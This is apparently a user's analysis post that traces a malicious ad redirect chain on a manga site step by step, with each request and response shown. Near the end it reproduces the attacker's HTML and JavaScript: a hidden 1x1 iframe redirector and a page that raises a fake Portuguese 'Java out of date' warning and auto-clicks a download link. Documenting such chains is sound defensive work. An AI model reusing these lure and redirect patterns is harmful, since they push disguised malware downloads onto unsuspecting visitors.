On the main page, between the "My Follows" and the "Popular Series" lists, there's an ad space:
<div class="general_box clearfix"><iframe src='/ads/mari300.html' frameborder='0' scrolling='no' style='border:0;padding:0;margin:0;width:300px;height:250px;'></iframe></div>
REQUEST: GET hxxp://vatoto.com/ads/mari300.html
RESPONSE: text/html:
<!DOCTYPE html>
<html>
<head>
<style>
html, body {margin:0; padding:0}
</style>
<title>Ad Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<script type='text/javascript' src='http://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250'></script>
</body>
</html>
REQUEST: GET hxxp://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250
RESPONSE: application/javascript:
document.write('<SCR'+'IPT TYPE="text/javascript" SRC="http://ib.adnxs.com/ttj?id=2547769&size=300x250"></SCR'+'IPT>');
REQUEST: GET hxxp://ib.adnxs.com/ttj?id=2547769&size=300x250
RESPONSE: text/html (in spite of this clearly returning javascript; I added newlines in a couple of places to make the actual redirection more obvious):
(function(){
function r(r){try{if(!window.location.ancestorOrigins)return;for(var n=0,t=window.location.ancestorOrigins.length;n<t;n++){r.call(null,window.location.ancestorOrigins[n],n)}}catch(o){}return[]}function n(r){var n=[],t;do{t=t?t.parent:window;try{r.call(null,t,n)}catch(o){n.push({})}}while(t!=window.top);return n}var t=n(function(r,n){n.push({referrer:r.document.referrer||null,location:r.location.href||null})});r(function(r,n){t[n].ancestor=r});var o='';for(var e=t.length-1;e>=0;e--){o=t[e].location;if(!o&&e>0){o=t[e-1].referrer;if(!o){o=t[e-1].ancestor}}if(o){break}}o=encodeURIComponent(o);
var i='http://ib.adnxs.com/ttj?ttjb=1&bdref='+o+'&id=2547769&size=300x250';
document.write('<script src="'+i+'"></'+'script>')})();
REQUEST: GET hxxp://ib.adnxs.com/ttj?ttjb=1&bdref=http%3A%2F%2Fwww.batoto.net%2F&id=2547769&size=300x250
RESPONSE: application/javascript:
document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://nym1.ib.adnxs.com/if?enc=ukkMAiuHhj_029eBc0aEPxsv3SQGgaU_9NvXgXNGhD-6SQwCK4eGPxy3HcaQeoEeRezi_nTj9XsdQaZTAAAAADngJgB2AgAA5gYAALoAAAA8tsIASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzXsAAgUCAQIAAI4APSfpOQAAAAA.&cnd=AS750-BR&udj=update_campaign(12760636%2C+false)&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1"></iframe>');document.write('<scr' + 'ipt src="http://cdn.adnxs.com/ANX_async_usersync.js"></scr'+'ipt>');
REQUEST: GET hxxp://nym1.ib.adnxs.com/if?enc=ERoMocEQqj8bL90kBoGlPxsv3SQGgaU_r0fhehSuvz8zMzMzMzPDP93skZK1Dip7Rezi_nTj9Xu_QKZTAAAAADngJgB2AgAArwcAAAIAAADY7vkASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzrUAAgUAAQIAAI4AYCZbgAAAAAA.&cnd=!ySMh5Aiho4ACENjd5wcYACDIphgwADgAQABIrw9QucCbAVgAYLUGaABwBHjkA4ABBIgB5AOQAQGYAQGgAQGoAQOwAQC5ATMzMzMzM8M_wQEzMzMzMzPDP8kB9ig4Urx0-T_ZAQAAAAAAAPA_4AEA9QGamZk-&ccd=!QAZnOQiho4ACENjd5wcYyKYYIAA.&udj=uf('a'%2C+341838%2C+1403404479)%3Buf('c'%2C+4198817%2C+1403404479)%3Buf('r'%2C+16379608%2C+1403404479)%3B&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1
RESPONSE: text/html:
<iframe src="http://cher.ehomestudy.com/300x250.html" frameborder="0" scrolling="no" width="300" height="250"></iframe>
REQUEST: GET hxxp://cher.ehomestudy.com/300x250.html
RESPONSE: text/html:
<html><head><title></title><meta name="robots" content="noindex"></head><body><iframe src="http://dl.lhpuk.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3" frameborder="0" scrolling="no" width="1" height="1"></iframe></body></html>
Oddly enough, even though this last iframe has dl.lhpuk.com in its src attribute, the next request is actually made to soft.zzstny.com...
REQUEST: GET hxxp://soft.zzstny.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3
RESPONSE: text/html:
<html><head><meta charset="utf-8"><title>Download Java for Your PC</title></head><body><a href="/topic/java/download.php?country=BR&ext=3&aid=102" id="reloc" target="_top" style="text-decoration:none;color:#fff;">loading...</a><script type="text/javascript">function invokeClick(o){ if(o.click)o.click(); else if(o.fireEvent)o.fireEvent("onclick"); else if(document.createEvent) { var evt = document.createEvent("MouseEvents"); evt.initEvent("click", true, true); o.dispatchEvent(evt); }} alert("ATENÇÃO! \nSua Versão do Java está Desatualizada, Há Riscos de Segurança, \nPor Favor Atualize Agora!");invokeClick(document.getElementById("reloc"));</script></body></html>
And this one creates a link, generates an alert(), and programmatically clicks on the link it created itself. Pretty sneaky stuff.